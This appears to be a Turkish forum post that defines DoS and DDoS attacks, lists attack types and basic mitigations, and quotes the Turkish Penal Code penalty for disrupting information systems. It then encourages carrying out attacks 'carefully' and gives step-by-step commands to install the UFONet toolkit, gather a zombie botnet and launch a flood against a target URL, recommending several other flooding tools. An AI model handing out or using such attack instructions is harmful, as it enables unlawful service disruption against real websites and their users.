DDoS ve DoS Kavramları Nedir ?
DoS | Tek bir ana bilgisayardan yapılan saldırının ağ trafiğini engellemesidir.
DDoS | Birden fazla bilgisayardan yapılan saldırıların ağ trafiğini engellemesidir.
DDos ve DoS Tanımları Nedir ?
DDoS saldırılarını gerçekleştirmek için zombi adı verilen cihazlardan oluşan botnetler kullanılmaktadır.
Genellikle Yapılan DDoS saldırıları, DoS saldırılarından daha başarılıdır.
Çünkü DDoS saldırıları birden fazla ana makineden yapılır. DoS saldırısı ise tek bir makineden yapılır.
DDoS Atmanın Amacı Nedir ?
DDoS atmanın amacı sisteme sızmak değil tam aksine sistemi aksatmaktır.
Sisteme maddi veya manevi zarar vermektir.
DDos Saldırı Türleri Nelerdir ?
Volume BasedDDoS (Hacim Odaklı Saldırı): amacı bant genişliğini şişirmektir. Dünyada yaygın olarak kullanılan saldırı türüdür.
Protocol BasedDDoS (Protokol Odaklı Saldırılar): OSI genelinde bir sürü katmanlar vardır. Bu katmanlar arasında açıklar kullanılarak yapılır. Çok tehlikeli bir saldırı türüdür.
Application LayerDDoS (Uygulama Katmanlı Saldırılar): Sunucuda yüklenme yaratan saldırılardır.
UDP FloodDDoS: Portları kapatan ve hizmet verilmemesini sağlayan saldırı türüdür.
SYN FloodDDoS: Sunucuda TCP odaklı kaynak paketleri sorun oluşturabilir. Bu paket dosyalar sunucudaki ciddi sorunlardır ve kaynakları kullanılamaz hale getirir. yani en tehlikeli saldırılardır.
PingFlood: IP üzerinden sunucuya ping atılması sırasında yapılan saldırıdır.
DoS ve DDoS Saldırı Engelleme Yöntemleri
DDoS saldırılarının engelleme gibi bir durum söz konusu değildir. Ancak saldırının hafifletilmesi için sistemin ağ altyapısının sağlam olması gerekmektedir.
Güvenlik duvarı ya da Antivirüs yazılımı kullanılmalıdır.
Ağ trafiği izlenilmesi gereklidir. Herhangi farklı bir durumda ağ cihazları yapılandırılmalıdır.
Cihazınız destekliyorsa rate limiting yaparak belirli IP adresinden gelen maksimum paket sayısı belirlenerek maksimum değeri aşan ıpler engellenebilir.
DDoS Atmanın Cezası Ve Hükmü Nedir ?
5237 sayılı TCK'nun 244/1. maddesi uyarınca “Bir bilişim sisteminin işleyişini engelleyen veya bozan kişi, bir yıldan beş yıla kadar hapis cezası ile cezalandırılır.” O halde, DDoS saldırıları “bir bilişim sisteminin işleyişinin engellenmesi” fiiline karşılık geldiğinden, TCK m. 244'te öngörülen suça vücut vermektedir.
DDoS atılabilir ancak dikkatli yapılması gerekmektedir.
DDoS Attack Nedir ?
Sitelerde ağ kaynaklarının eş zamanlı olarak hizmet verebileceği isteklerin sayısı sınırlıdır. Sunucuyu internete bağlayan kanalında bir sınırı ( bant genişliği ) vardır. DDoS saldırıları atarak bu sınırı aşıyoruz ve sistemin hizmet vermesini engelliyoruz
Bunun Sonucunda
İsteklere verilen yanıtlar hızlıdan yavaşa döner
Site çöker ve kısa bir süre kullanılamaz hale gelir
DDos Attack Nasıl Yapılır ?
Öncelike bize tool gerekli bunun için linux işletim sistemini kullanacağız.
Hep beraber DDoS atma adımlarına geçelim.
| cd Desktop yada cd Masaüstü yazıyoruz. ( Türkçe Veya İngilizce ) |
| git clone GitHub - epsylon/ufonet: UFONet - Denial of Service Toolkit ( masaüstüne dosyamızı oluşturduk ) |
| sudo python setup.py install ( python dosyamızı indirelim ) |
> pip install geoip <
> pip install requests <
> pip install pycrypto <
> pip install scapy <
| ./ufonet ( programı çalıştırdık ) |
| ufonet --download-zombies ( zombilerimizi botnet ağımıza indirdik ) |
| ./ufonet -t /botnet/zombies.txt ( zombileriniz arasından canlı olanları ayırır. ) |
| ./ufonet -a http://hedefsite.com ( DDoS saldırsı başlatır. ) |
THOR HULK HOIC LOIC
TOOLARINI KULLANABILIRSINIZ
İYİ FORUMLAR
Son düzenleme: